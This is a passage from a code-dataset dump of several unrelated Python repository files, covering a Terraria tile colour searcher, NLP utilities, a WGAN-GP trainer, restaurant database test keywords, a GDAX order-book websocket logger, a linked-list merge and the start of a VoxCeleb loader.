[painted_red, painted_green, painted_blue]\n\n\n # Build the 5 tiles with the smallest difference scores\ndef return_min_scores(r, g, b, target_color_list):\n input_color = [r, g, b]\n scores = [(available_matrices[config['matrix']](input_color, color), i) for i,\n color in enumerate(target_color_list)]\n min_scores_index = sorted(scores)[:5]\n return min_scores_index\n\n\n# Determine the names from the indices of return_min_scores and return them\n# The list layout is tile + wall + tile(paint1) + wall(paint1) + tile(paint2)...\ndef select_tile_combination(r, g, b, target_color_list):\n names = ''\n num = return_min_scores(r, g, b, target_color_list)\n for i in num:\n if i[1] >= paint_start:\n paint_name = '+{}Paint'.format(paint_dictionary[int(i[1] / paint_start) - 1]['name'])\n else:\n paint_name = ''\n\n target_index = i[1] % paint_start\n target_item = base_dictionary[target_index]['name']\n target_item_rgb = map_colors[i[1]][:3]\n if target_index >= wall_start:\n tile_type = 'wall'\n else:\n tile_type = 'tile'\n\n names += '({}) {}{} {}\\n\\n'.format(tile_type, target_item, paint_name, target_item_rgb)\n return names\n\nclass RgbInputFrame():\n def __init__(self, master):\n frame = Frame(master)\n frame.pack()\n\n self.txt = StringVar()\n self.txt.set('')\n self.bool1 = BooleanVar()\n self.bool1.set(True)\n\n self.description = Label(master, text 
= '検索したい色を選択してsearchボタンを押してください')\n self.description.pack()\n self.description.place(x = 30, y = 10)\n\n self.lbl1 = Label(master, text='red')\n self.lbl1.pack()\n self.lbl1.place(x = 160, y = 50)\n self.lbl2 = Label(master, text='green')\n self.lbl2.pack()\n self.lbl2.place(x = 160, y = 90)\n self.lbl3 = Label(master, text='blue')\n self.lbl3.pack()\n self.lbl3.place(x = 160, y = 130)\n\n self.scrl1 = Scale(master, orient = HORIZONTAL, to = 255, command = self.scrl_method)\n self.scrl1.pack()\n self.scrl1.place(x = 200, y = 30)\n self.scrl2 = Scale(master, orient = HORIZONTAL, to = 255, command = self.scrl_method)\n self.scrl2.pack()\n self.scrl2.place(x = 200, y = 70)\n self.scrl3 = Scale(master, orient = HORIZONTAL, to = 255, command = self.scrl_method)\n self.scrl3.pack()\n self.scrl3.place(x = 200, y = 110)\n\n self.cvs = Canvas(master, bg = '#000000', width = 100, height = 100)\n self.cvs.pack()\n self.cvs.place(x = 30, y = 45)\n self.cvs1 = Canvas(master, width = 20, height = 20)\n self.cvs1.pack()\n self.cvs1.place(x = 30, y = 240)\n self.cvs2 = Canvas(master, width = 20, height = 20)\n self.cvs2.pack()\n self.cvs2.place(x = 30, y = 270)\n self.cvs3 = Canvas(master, width = 20, height = 20)\n self.cvs3.pack()\n self.cvs3.place(x = 30, y = 300)\n self.cvs4 = Canvas(master, width = 20, height = 20)\n self.cvs4.pack()\n self.cvs4.place(x = 30, y = 330)\n self.cvs5 = Canvas(master, width = 20, height = 20)\n self.cvs5.pack()\n self.cvs5.place(x = 30, y = 360)\n\n self.CheckBox = Checkbutton(master, text = 'Paintを使用する', variable = self.bool1)\n self.CheckBox.pack()\n self.CheckBox.place(x = 30, y = 160)\n\n self.button = Button(master, text = 'Search', command = self.change_label)\n self.button.pack()\n self.button.place(x = 150, y = 195)\n\n self.label4 = Label(master, textvariable = self.txt, justify = 'left')\n self.label4.pack()\n self.label4.place(x = 55, y = 240)\n\n def hexadecimal(self, rgb):\n num = hex(rgb).replace('0x', '')\n if len(num) == 1:\n num = '0' + num\n return num\n\n def rgb_to_html_color(self, r, g, b):\n color = '#' + '{}{}{}'.format(self.hexadecimal(r), self.hexadecimal(g), self.hexadecimal(b))\n return color\n\n def get_rgb(self):\n r = self.scrl1.get()\n g = self.scrl2.get()\n b = self.scrl3.get()\n return [r, g, b]\n\n def use_paint(self):\n if self.bool1.get():\n return map_colors\n else:\n return base_colors\n\n def scrl_method(self, event):\n html_color = self.rgb_to_html_color(self.get_rgb()[0], self.get_rgb()[1], self.get_rgb()[2])\n self.cvs.configure(bg = html_color)\n\n def send_message(self):\n return select_tile_combination(self.get_rgb()[0], self.get_rgb()[1], self.get_rgb()[2], self.use_paint())\n\n def send_color(self):\n index = return_min_scores(self.get_rgb()[0], self.get_rgb()[1], self.get_rgb()[2], self.use_paint())\n color1 = self.rgb_to_html_color(map_colors[index[0][1]][0], map_colors[index[0][1]][1], map_colors[index[0][1]][2])\n self.cvs1.create_rectangle(0, 0, 25, 25, fill = color1)\n color2 = self.rgb_to_html_color(map_colors[index[1][1]][0], map_colors[index[1][1]][1], map_colors[index[1][1]][2])\n self.cvs2.create_rectangle(0, 0, 25, 25, fill = color2)\n color3 = self.rgb_to_html_color(map_colors[index[2][1]][0], map_colors[index[2][1]][1], map_colors[index[2][1]][2])\n self.cvs3.create_rectangle(0, 0, 25, 25, fill = color3)\n color4 = self.rgb_to_html_color(map_colors[index[3][1]][0], map_colors[index[3][1]][1], map_colors[index[3][1]][2])\n self.cvs4.create_rectangle(0, 0, 25, 25, fill = color4)\n color5 = 
self.rgb_to_html_color(map_colors[index[4][1]][0], map_colors[index[4][1]][1], map_colors[index[4][1]][2])\n self.cvs5.create_rectangle(0, 0, 25, 25, fill = color5)\n\n def change_label(self):\n self.cvs1.delete('all')\n self.cvs2.delete('all')\n self.cvs3.delete('all')\n self.cvs4.delete('all')\n self.cvs5.delete('all')\n self.txt.set(self.send_message())\n self.send_color()\n\n\n# コンフィグの読み込みに失敗した時に投げられる\nclass BadConfigException(BaseException):\n 'Raises when config load fails'\n\n#検索に使用するリスト\ndata = json.load(open('MapColor.json'))\npaint_dictionary = data['Paints']\nbase_dictionary = data['Tiles'] + data['Walls']\nwall_start = len(data['Tiles'])\npaint_start = len(base_dictionary)\nbase_colors = [[int(color) for color in item['color'].split(',')] for item in base_dictionary]\npaint_colors = [[int(color) for color in paint['color'].split(',')] for paint in paint_dictionary]\npainted_colors = [painted_color(base_colors[i], paint_colors[j], i >= wall_start)\n for j in range(len(paint_colors))\n for i in range(len(base_colors))]\nmap_colors = base_colors + painted_colors\n\n# 計算関数名と関数のペア\navailable_matrices = {'absolute': lambda rgb1, rgb2: abs(rgb2[0] - rgb1[0]) + abs(rgb2[1] - rgb1[1]) + abs(rgb2[2] - rgb1[2]),\n 'euclid': color_helper.euclidean_distance,\n 'cie-lab': color_helper.lab_difference}\n\n# コンフィグの読み込み\nconfig_file_name = 'config.json'\nif os.path.exists(config_file_name):\n with open(config_file_name) as f:\n config = json.load(f)\n if not config['matrix'] in available_matrices:\n raise BadConfigException('The matrix `{}` is not available. Please specify from [{}]'.format(config['matrix'], ', '.join(available_matrices.keys())))\nelse:\n # デフォルトを設定してコンフィグを作成\n config = {'matrix': 'cie-lab'}\n with open(config_file_name, 'w') as f:\n json.dump(config, f, indent=4, sort_keys=True)\n\nif __name__ == '__main__':\n root = Tk()\n root.title('Terraria Tile Searcher')\n root.geometry('340x430')\n RgbInputFrame(root)\n root.mainloop()\n","repo_name":"NobodyGonbe/terraria_tile_searcher","sub_path":"tile_searcher.py","file_name":"tile_searcher.py","file_ext":"py","file_size_in_byte":9335,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"71560329522","text":"import copy\nimport hashlib\nimport pickle\nimport subprocess\nimport time\nfrom pathlib import Path\nfrom typing import Set, List, Tuple, Union\n\nimport pandas as pd\nimport spacy\nfrom pydantic import BaseModel\nfrom spacy.lang.en import English\nfrom spacy.tokens import Doc, Token\n\n\nclass Shell(BaseModel):\n verbose: bool = True\n\n @classmethod\n def format_kwargs(cls, **kwargs) -> str:\n outputs = []\n for k, v in kwargs.items():\n k = k.replace(\"_\", \"-\")\n k = f\"--{k}\"\n outputs.extend([k, str(v)])\n return \" \".join(outputs)\n\n def run_command(self, command: str) -> str:\n # Continuously print outputs for long-running commands\n # Refer: https://fabianlee.org/2019/09/15/python-getting-live-output-from-subprocess-using-poll/\n print(dict(command=command))\n process = subprocess.Popen(command, shell=True, stdout=subprocess.PIPE)\n outputs = []\n\n while True:\n if process.poll() is not None:\n break\n o = process.stdout.readline().decode()\n if o:\n outputs.append(o)\n if self.verbose:\n print(o.strip())\n\n return \"\".join(outputs)\n\n def run(self, command: str, *args, **kwargs) -> str:\n args = [str(a) for a in args]\n command = \" \".join([command] + args + [self.format_kwargs(**kwargs)])\n return self.run_command(command)\n\n\ndef hash_text(x: str) -> 
str:\n return hashlib.md5(x.encode()).hexdigest()\n\n\nclass Timer(BaseModel):\n name: str = \"\"\n start: float = 0.0\n\n def __enter__(self):\n self.start = time.time()\n return self\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n duration = round(time.time() - self.start, 3)\n print(f\"Timer {self.name}: {duration}s\")\n\n\nclass PickleSaver(BaseModel):\n path: Path\n\n def dump(self, obj):\n if not self.path.parent.exists():\n self.path.parent.mkdir(exist_ok=True)\n with open(self.path, \"wb\") as f:\n pickle.dump(obj, f)\n\n def load(self):\n with Timer(name=str(self.path)):\n with open(self.path, \"rb\") as f:\n return pickle.load(f)\n\n\nclass FlexiModel(BaseModel):\n class Config:\n arbitrary_types_allowed = True\n\n\ndef get_simple_stats(numbers: List[Union[int, float]]):\n return dict(min=min(numbers), max=max(numbers), avg=sum(numbers) / len(numbers),)\n\n\ndef count_joins(spans: Set[Tuple[int, int]]) -> int:\n count = 0\n for a_start, a_end in spans:\n for b_start, b_end in spans:\n if (a_start, a_end) == (b_start, b_end):\n continue\n\n if b_start <= a_start <= b_end + 1 or b_start - 1 <= a_end <= b_end:\n count += 1\n return count // 2\n\n\ndef test_spacy():\n texts = [\n \"Autonomous cars are bad because they shift liability to manufacturers.\",\n \"I enjoyed this book very much.\",\n \"The design is nice and convenient.\",\n \"this speaker sucks\",\n \"I was disappointed in this.\",\n ]\n nlp: English = spacy.load(\"en_core_web_sm\")\n token: Token\n doc: Doc\n for doc in nlp.pipe(texts):\n records = []\n for token in doc:\n records.append(\n dict(\n i=token.i,\n text=token.text,\n pos=token.pos_,\n dep=token.dep_,\n head=token.head,\n head_pos=token.head.pos_,\n children=list(token.children),\n )\n )\n print(pd.DataFrame(records))\n print(dict(chunks=list(doc.noun_chunks)))\n print(\"#\" * 80)\n\n\ndef update_nested_dict(d: dict, k: str, v, i=0, sep=\"__\"):\n d = copy.deepcopy(d)\n keys = k.split(sep)\n assert keys[i] in d.keys(), str(dict(keys=keys, d=d, i=i))\n if i == len(keys) - 1:\n orig = d[keys[i]]\n if v != orig:\n print(dict(updated_key=k, new_value=v, orig=orig))\n d[keys[i]] = v\n else:\n d[keys[i]] = update_nested_dict(d=d[keys[i]], k=k, v=v, i=i + 1)\n return d\n\n\ndef test_update_nested_dict():\n d = dict(top=dict(middle_a=dict(last=1), middle_b=0))\n print(update_nested_dict(d, k=\"top__middle_b\", v=-1))\n print(update_nested_dict(d, k=\"top__middle_a__last\", v=-1))\n print(update_nested_dict(d, k=\"top__middle_a__last\", v=1))\n\n\nif __name__ == \"__main__\":\n test_shell()\n test_spacy()\n test_update_nested_dict()\n","repo_name":"FengLingCong13/SBSK-ASTE","sub_path":"aste/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":4491,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"75"} +{"seq_id":"71077357042","text":"import torch\nimport torchvision\nfrom tqdm import tqdm\n\nfrom torch.utils.tensorboard import SummaryWriter\n\nimport argparse\n\ntorch.manual_seed(0)\n\n\nclass Discriminator(torch.nn.Module):\n def __init__(self, img_size, n_ch):\n super(Discriminator, self).__init__()\n self.img_size = img_size\n self.n_ch = n_ch\n self.img_shape = (n_ch, img_size, img_size)\n self.main = torch.nn.Sequential(\n torch.nn.Flatten(1, -1),\n torch.nn.Linear(img_size*img_size, 1024),\n torch.nn.LeakyReLU(0.2),\n torch.nn.Dropout(0.3),\n\n torch.nn.Linear(1024, 512),\n torch.nn.LeakyReLU(0.2),\n torch.nn.Dropout(0.3),\n\n torch.nn.Linear(512, 256),\n torch.nn.LeakyReLU(0.2),\n 
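A note on the utils.py record above: the `__main__` block calls test_shell(), but no such function is defined anywhere in the module, so running it raises NameError. The original test is unknown; a plausible minimal definition that just exercises the Shell wrapper (the command and kwarg here are illustrative, not from the source):

def test_shell():
    # Run a harmless command through the subprocess wrapper and show the
    # kwarg-to-flag conversion ("key_word" becomes "--key-word").
    shell = Shell(verbose=True)
    output = shell.run("echo", "hello", key_word="value")
    print(dict(output=output))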
torch.nn.Dropout(0.3),\n\n torch.nn.Linear(256, 1),\n # torch.nn.Sigmoid()\n # Very helpful to comment last sigmoid activation\n )\n return\n\n def forward(self, x):\n return self.main(x)\n\n\nclass Generator(torch.nn.Module):\n def __init__(self, dim_noise, img_size, n_ch):\n super(Generator, self).__init__()\n self.img_size = img_size\n self.n_ch = n_ch\n self.img_shape = (n_ch, img_size, img_size)\n self.main = torch.nn.Sequential(\n torch.nn.Linear(dim_noise, 256),\n torch.nn.LeakyReLU(0.2),\n\n torch.nn.Linear(256, 512),\n torch.nn.LeakyReLU(0.2),\n\n torch.nn.Linear(512, 1024),\n torch.nn.LeakyReLU(0.2),\n\n torch.nn.Linear(1024, img_size*img_size),\n torch.nn.Tanh(),\n torch.nn.Unflatten(1, self.img_shape)\n )\n return\n\n def forward(self, x):\n return self.main(x)\n\n\nclass GAN:\n def __init__(self, dim_noise, lr_d, lr_g, d_step, n_epoch, img_size, n_ch, gp_lambda, beta_1, beta_2):\n self.dim_noise = dim_noise\n self.lr_d = lr_d\n self.lr_g = lr_g\n self.gp_lambda = gp_lambda\n self.d_step = d_step\n self.n_epoch = n_epoch\n self.img_size = img_size\n self.n_ch = n_ch\n self.img_shape = (n_ch, img_size, img_size)\n\n self.discriminator = Discriminator(img_size=img_size, n_ch=n_ch)\n self.generator = Generator(self.dim_noise, img_size=self.img_size, n_ch=n_ch)\n\n self.generator.cuda()\n self.discriminator.cuda()\n\n self.criterion = torch.nn.BCELoss()\n\n self.g_optim = torch.optim.Adam(self.generator.parameters(), lr=self.lr_g, betas=(beta_1, beta_2))\n self.d_optim = torch.optim.Adam(self.discriminator.parameters(), lr=self.lr_d, betas=(beta_1, beta_2))\n return\n\n def train(self, train_loader, test_loader):\n\n writer = SummaryWriter()\n\n test_noise = torch.randn(64, self.dim_noise, device=\"cuda:0\")\n for i in range(self.n_epoch):\n\n epoch_loss_d = 0.\n epoch_loss_g = 0.\n epoch_score_p = 0.\n epoch_score_f = 0.\n\n self.generator.train()\n self.discriminator.train()\n with tqdm(total=len(train_loader), desc=f\"epoc{i+1}\") as pbar:\n for k, (data_real, lbl) in enumerate(train_loader):\n data_real = data_real.cuda()\n\n d_loss, p_score, f_score = self.train_discriminator(data_real)\n g_loss = self.train_generator(data_real.shape[0])\n\n epoch_loss_d += d_loss\n epoch_loss_g += g_loss\n epoch_score_f += f_score\n epoch_score_p += p_score\n\n pbar.set_postfix({\"d_loss\": d_loss, \"g_loss\": g_loss,\n \"p_score\": p_score, \"f_score\": f_score})\n pbar.update()\n epoch_loss_g = epoch_loss_g/(k+1)\n epoch_loss_d = epoch_loss_d/(k+1)\n epoch_score_p /= k+1\n epoch_score_f /= k+1\n pbar.set_postfix({\"epoch: d_loss\": epoch_loss_d, \"g_loss\": epoch_loss_g,\n \"p_score\": epoch_score_p, \"f_score\": epoch_score_f})\n\n writer.add_scalar('loss/generator', epoch_loss_g, i)\n writer.add_scalar('loss/discriminator', epoch_loss_d, i)\n writer.add_scalar('score/real', epoch_score_p, i)\n writer.add_scalar('score/fake', epoch_score_f, i)\n self.generator.eval()\n self.discriminator.eval()\n test_img = self.generator(test_noise)\n test_img = (test_img + 1.0)/2.0 # denorm\n writer.add_images('img', test_img, i)\n return\n\n def train_discriminator(self, data_real):\n d_loss = 0.\n score_p = 0.\n score_f = 0.\n n_real = data_real.shape[0]\n\n for _d_n in range(self.d_step):\n\n data_fake = self.generate_fake(n_real).detach()\n mix_noise = torch.rand(n_real, 1, 1, 1).cuda()\n data_mixed = (1-mix_noise) * data_real + mix_noise * data_fake\n data_mixed = data_mixed.detach()\n data_mixed.requires_grad_()\n\n p_f = self.discriminator(data_fake)\n p_p = self.discriminator(data_real)\n p_mix = 
self.discriminator(data_mixed)\n\n loss_1 = p_f - p_p\n\n # gradient penalty\n grad_p_x = torch.autograd.grad(p_mix.sum(), data_mixed, retain_graph=True, create_graph=True)[0]\n # p_mix.sum(), trick to cal \\par y_i / \\parx_i independentl\n assert grad_p_x.shape == data_mixed.shape\n grad_norm = torch.sqrt(grad_p_x.square().sum(axis=(1, 2, 3)) + 1e-14)\n loss_2 = self.gp_lambda * torch.square(grad_norm - 1.)\n\n loss = loss_1 + loss_2\n loss = loss.mean()\n self.d_optim.zero_grad()\n loss.backward()\n self.d_optim.step()\n\n score_p += p_p.mean().item()\n score_f += p_f.mean().item()\n d_loss += loss.item()\n return d_loss/self.d_step, score_p/self.d_step, score_f/self.d_step\n\n def train_generator(self, batch_size):\n g_loss = 0.\n\n fake = self.generate_fake(batch_size)\n p_f = self.discriminator(fake)\n loss = -p_f.mean()\n\n self.g_optim.zero_grad()\n loss.backward()\n self.g_optim.step()\n\n g_loss += loss.item()\n\n return g_loss\n\n def generate_fake(self, n_fake):\n noise = torch.randn(n_fake, self.dim_noise, device=\"cuda:0\")\n return self.generator(noise)\n\n\ndef main(args):\n torch.random.manual_seed(0)\n\n if args.data == 'MNIST':\n m_transform = torchvision.transforms.Compose([torchvision.transforms.ToTensor(),\n torchvision.transforms.Normalize([0.5], [0.5])])\n else:\n raise Exception['you have not defined this dataset']\n data_train = torchvision.datasets.MNIST(root=args.data_root,transform=m_transform, train=True,\n download=True)\n data_test = torchvision.datasets.MNIST(root=args.data_root, transform=m_transform, train=False)\n\n train_loader = torch.utils.data.DataLoader(dataset=data_train, batch_size=args.batch_size,\n shuffle=True, drop_last=False)\n test_loader = torch.utils.data.DataLoader(dataset=data_test, batch_size=args.batch_size,\n shuffle=True, drop_last=False)\n gan = GAN(dim_noise=args.dim_noise, lr_d=args.lr_d, lr_g=args.lr_g,n_ch=args.n_ch,\n d_step=args.d_step, n_epoch=args.num_epochs, img_size=args.img_size,\n gp_lambda=args.gp_lambda, beta_1=args.beta1, beta_2=args.beta2)\n gan.train(train_loader, test_loader)\n return\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser(description=\"parse args\")\n parser.add_argument('--data', required=True, help='MNIST|HAM10000')\n parser.add_argument('--data-root', default='~/Documents/datas/MNIST_data/')\n parser.add_argument('-n', '--num-epochs', default=200, type=int, help='number of training epochs')\n parser.add_argument('--lr-d', default=2e-4, type=float)\n parser.add_argument('--lr-g', default=2e-4, type=float)\n parser.add_argument('--beta1', default=0.5)\n parser.add_argument('--beta2', default=0.999)\n parser.add_argument('--gp_lambda', default=10, type=float, help='for wgan-gp, gradient penalty parameter')\n parser.add_argument('--n_ch', default=1, type=int, help='number of channels of figure')\n parser.add_argument('--img-size', default=28, type=int)\n parser.add_argument('--dim-noise', default=128, type=int)\n parser.add_argument(\"--d-step\", default=5, type=int)\n parser.add_argument('--batch-size', default=512)\n args = parser.parse_args()\n main(args)\n","repo_name":"im-Kitsch/DLMB","sub_path":"toy_task/GAN/WGAN/wgan_gp.py","file_name":"wgan_gp.py","file_ext":"py","file_size_in_byte":8790,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"26616459808","text":"from robot.api.deco import keyword\nfrom libraries.db.KjtDbLibrary.dto.restaurantdetails import RestaurantDetails\nfrom autocore.AssertsLibrary import 
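Two notes on the wgan_gp.py record above. First, `raise Exception['you have not defined this dataset']` indexes the Exception class and so raises a TypeError instead of the intended message; it should be `raise Exception('you have not defined this dataset')`. Second, the gradient-penalty term buried in train_discriminator factors cleanly into a standalone helper; a minimal sketch using the same per-sample interpolation scheme (mixing weights relabelled but equivalent in distribution):

import torch

def gradient_penalty(discriminator, real, fake, gp_lambda=10.0):
    # Interpolate real and fake samples with a per-sample mixing weight.
    eps = torch.rand(real.size(0), 1, 1, 1, device=real.device)
    mixed = (eps * real + (1.0 - eps) * fake).detach().requires_grad_(True)
    scores = discriminator(mixed)
    # Summing scores before autograd.grad yields per-sample input gradients
    # in a single call (the same trick the record's comment alludes to).
    grads = torch.autograd.grad(scores.sum(), mixed, create_graph=True)[0]
    grad_norm = grads.flatten(start_dim=1).norm(2, dim=1)
    return gp_lambda * ((grad_norm - 1.0) ** 2).mean()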
assert_equal\nfrom autocore.bases import DBLibraryComponent\nfrom autocore import envlabels\n\nclass Restaurant(DBLibraryComponent):\n\n @keyword(tags=(\"kjt\", \"restaurant\"))\n def query_restaurant_details_from_restaurant_table(self, rid: str, include_html: bool = False, _: RestaurantDetails = None) -> RestaurantDetails:\n \"\"\"Query the restaurant details using the provided ``rid`` and return the details as `RestaurantDetails`.\n - ``include_html`` - if ``True``, will include the following values in the returned object: ``comment``, ``lunchDinnerAppInfo``,\n ``creditCardsInfo``, ``sizeInfo``. Default value is ``False``.\n \"\"\"\n query = \"SELECT x.* FROM kjt.restaurant x where rid = %s;\"\n results = self.db.execute(query, (rid,))\n if len(results) == 0:\n raise Exception(\"The query did not return any results.\")\n \n result = results[0]\n details = RestaurantDetails(\n rid=result['rid'],\n enName=result['enName'],\n cnName=result['cnName'],\n exName=result['exName'],\n status=result['status'],\n openTime=result['openTime'],\n rejectTime=result['rejectTime'],\n closeTime=result['closeTime'],\n callCtrRank=result['callCtrRank'],\n disableCallPriority=result['disableCallPriority'],\n hasDelivery=result['hasDelivery'],\n hasLunchSpecial=result['hasLunchSpecial'],\n hasDinnerSpecial=result['hasDinnerSpecial'],\n hasComboApp=result['hasComboApp'],\n hasCancelOrder=result['hasCancelOrder'],\n printMethod=result['printMethod'],\n dishTax=result['dishTax'],\n deliverTax=result['deliverTax'],\n deliveryFee=result['deliveryFee'],\n convenienceFee=result['convenienceFee'],\n convenienceTax=result['convenienceTax'],\n minimumDelivery=result['minimumDelivery'],\n matchMinimumDelivery=result['matchMinimumDelivery'],\n travelMode=result['travelMode'],\n forwardedPhone=result['forwardedPhone'],\n contactPhone1=result['contactPhone1'],\n contactPhone2=result['contactPhone2'],\n contactPhone3=result['contactPhone3'],\n smsPhone=result['smsPhone'],\n hasSmsEnabled=result['hasSmsEnabled'],\n fax=result['fax'],\n address1=result['address1'],\n address2=result['address2'],\n city=result['city'],\n state=result['state'],\n zipcode=result['zipcode'],\n hourText=result['hourText'],\n website=result['website'],\n creditCards=result['creditCards'],\n creditCardMask=result['creditCardMask'],\n displayMask=result['displayMask'],\n languageMask=result['languageMask'],\n ccZipCode=result['ccZipCode'],\n ccCvc=result['ccCvc'],\n ccSplit=result['ccSplit'],\n ccSwipeInStore=result['ccSwipeInStore'],\n preauthcarate=result['preauthcarate'],\n separateOrder=result['separateOrder'],\n separateOrderFeeType=result['separateOrderFeeType'],\n separateOrderFeeAmount=result['separateOrderFeeAmount'],\n etZoneOffset=result['etZoneOffset'],\n notes=result['notes'],\n closingRemark=result['closingRemark'],\n pickupClosingRemark=result['closingRemark'],\n deliveryClosingRemark=result['deliveryClosingRemark'],\n groupMask=result['groupMask'],\n minAssignedAgents=result['minAssignedAgents'],\n maxBenchedAgents=result['maxBenchedAgents'],\n mistakeRateThreshold=result['mistakeRateThreshold'],\n createTime=result['createTime'],\n updateTime=result['updateTime']\n )\n if include_html:\n details['comment'] = result['comment']\n details['lunchDinnerAppInfo'] = result['lunchDinnerAppInfo']\n details['creditCardsInfo'] = result['creditCardsInfo']\n details['sizeInfo'] = result['sizeInfo']\n\n self.logger.pretty_debug(details)\n return details\n \n @keyword(tags=(\"kjt\", \"restaurant\"))\n def 
restaurant_type_based_on_restaurant_table_should_be(self, rid: str, exp_resto_type: str, no_check_in_prod: bool = False):\n \"\"\"Verify the type of the restaurant with the provided``rid``.\n - ``exp_resto_type``: Accepted values are: ``external``, ``pos_only``, ``oo_only``, ``pos_and_oo``\n \"\"\"\n if no_check_in_prod and self.globals.env == envlabels.PROD_ENV:\n self.logger.info(f\"No checking of restaurant type was made.\")\n return\n \n possible_exp_resto_type = ['external', 'pos_only','oo_only', 'pos_and_oo']\n exp_resto_type = exp_resto_type.lower().replace(\" \",\"\")\n \n if exp_resto_type not in possible_exp_resto_type:\n raise Exception(f\"Please make sure that the value of exp_resto_type is any of {possible_exp_resto_type}\")\n \n resto_details = self.query_restaurant_details_from_restaurant_table(rid=rid)\n cc_mask = resto_details['creditCardMask']\n if cc_mask is None:\n raise Exception(f\"Restaurant with rid: {rid} has no credit card mask.\")\n cc_mask = int(cc_mask)\n \n if cc_mask < 32:\n act_resto_type = 'external'\n elif cc_mask >= 128 and cc_mask < 160:\n act_resto_type = 'pos_only'\n elif cc_mask >= 160 and cc_mask < 192:\n act_resto_type = 'oo_only'\n elif cc_mask >= 192 and cc_mask < 224:\n act_resto_type = 'pos_and_oo'\n else:\n raise Exception(f\"Cannot identify type of restaurant with rid: {rid}. Actual credit card mask: {cc_mask}\")\n \n assert_equal(actual=act_resto_type, exp=exp_resto_type, desc=\"Restaurant type.\")\n\n\n @keyword(tags=(\"kjt\", \"restaurant\"))\n def restaurant_status_based_on_restaurant_table_should_be(self, rid: str, exp_status: str):\n resto_details = self.query_restaurant_details_from_restaurant_table(rid=rid)\n act_status = resto_details['status']\n assert_equal(actual=act_status, exp=exp_status, desc=\"Restaurant Status\")\n\n","repo_name":"acecalimag/ace-autobot-usereditors","sub_path":"libraries/db/KjtDbLibrary/keywords/restaurant.py","file_name":"restaurant.py","file_ext":"py","file_size_in_byte":6414,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71478597361","text":"from scripts.data import AnimalData\nfrom scripts.model import AnimalClassifier\n\n\n# --------------\n# Step 1\n# getting test data\ndata_o = AnimalData()\n# data_o.create_preprocessed_images()\ntest_files_path = data_o.get_test_files_path()\n\n# --------------\n# Step 2\n# building model\nclf_o = AnimalClassifier()\nclf_model = clf_o.get_model()\n\n\n\n# --------------\n# Step 3\n# recognize images\n# test_img = 1\n# clf_o.recognize_animals(clf_model, arr_images_path=test_files_path)\nclf_o.recognize_animal(clf_model, img_path=test_files_path[5])\n","repo_name":"evgen-ryzhkov/animals_clf_cnn_inception","sub_path":"scripts/pipeline.py","file_name":"pipeline.py","file_ext":"py","file_size_in_byte":534,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"74434164721","text":"############################################\n##\n## Estalishes a websocket of gdax\n## Subscribe level2 ob\n## Write data into a csv\n##\n## Yi Bao 06/14/2018\n##\n############################################\nimport websockets, asyncio\nimport json\nimport csv\nimport pprint\n\nurl = \"wss://ws-feed.gdax.com\"\nf = open(\"level2.csv\", \"w\")\n\n''' \"changes\" is a list of [\"side\", \"price\", \"size\"] '''\ncsv_columns = [\"time\", \"product_id\", \"side\", \"price\", \"size\", \"type\"]\nwriter = csv.DictWriter(f, fieldnames = csv_columns)\nwriter.writeheader()\nasync def 
start_gdax_websocket():\n async with websockets.connect(url) as websocket:\n await websocket.send(build_request())\n async for m in websocket:\n #print(m)\n j = json.loads(m)\n ''' the first message is asks, bids and channels '''\n if \"channels\" in j or \"asks\" in j:\n continue\n pprint.pprint(j)\n \n j[\"side\"] = j[\"changes\"][0][0]\n j[\"price\"] = j[\"changes\"][0][1]\n j[\"size\"] = j[\"changes\"][0][2]\n\n entry = {k: j[k] for k in csv_columns}\n writer.writerow(entry)\n f.flush()\n\n\ndef build_request():\n return '{ \\\n \"type\": \"subscribe\", \\\n \"product_ids\": [\"BTC-USD\"], \\\n \"channels\": [ \\\n \"level2\" \\\n ] \\\n }'\n\n\ndef main():\n asyncio.get_event_loop().run_until_complete(start_gdax_websocket())\n \nif __name__==\"__main__\":\n main()\n","repo_name":"cqbaoyi/crypto","sub_path":"ws_level2.py","file_name":"ws_level2.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"70637159922","text":"from myLinkedList import LinkedList\n# Singly-linked lists are already defined with this interface:\nclass ListNode(object):\n def __init__(self, x):\n self.value = x\n self.next = None\n\ndef mergeTwoLinkedLists(l1, l2):\n if not l1 and not l2:\n return None\n if not l1:\n return l2\n if not l2:\n return l1\n if l1.value > l2.value:\n l3 = ListNode(l2.value)\n l2 = l2.next\n else:\n l3 = ListNode(l1.value)\n l1 = l1.next\n \n l3_head = l3\n\n while l1 and l2:\n if l1.value > l2.value:\n curr = ListNode(l2.value)\n l2 = l2.next\n l3.next = curr \n else:\n curr = ListNode(l1.value)\n l1 = l1.next \n l3.next = curr\n l3 = curr\n \n while l1:\n curr = ListNode(l1.value)\n l1 = l1.next \n l3.next = curr\n l3 = curr\n \n while l2:\n curr = ListNode(l2.value)\n l2 = l2.next \n l3.next = curr\n l3 = curr\n \n return l3_head\n \n \n\nl1 = LinkedList()\nl1.push(4)\nl1.push(2)\nl1.push(1)\nl1.push(1)\n\nl2 = LinkedList()\nl2.push(5)\nl2.push(3)\nl2.push(0)\n\nprint(mergeTwoLinkedLists(l1.head, l2.head))","repo_name":"jaynilpatel/codesignal","sub_path":"Interview Practice/Linked Lists/mergeTwoLinkedLists.py","file_name":"mergeTwoLinkedLists.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"71120382002","text":"# dataset.py\nimport os\nimport pickle\n\nimport torch\nfrom torch.utils.data import DataLoader, ConcatDataset\nfrom datasets import load_dataset\nfrom sklearn.preprocessing import LabelEncoder\nimport torchaudio\nfrom tqdm import tqdm\nimport numpy as np\n\n\n# Load all splits of the dataset\nos.makedirs('data/voxceleb1', exist_ok=True)\nfrom torchaudio.datasets import VoxCeleb1Identification # noqa: E402\n\ndataset_dict = 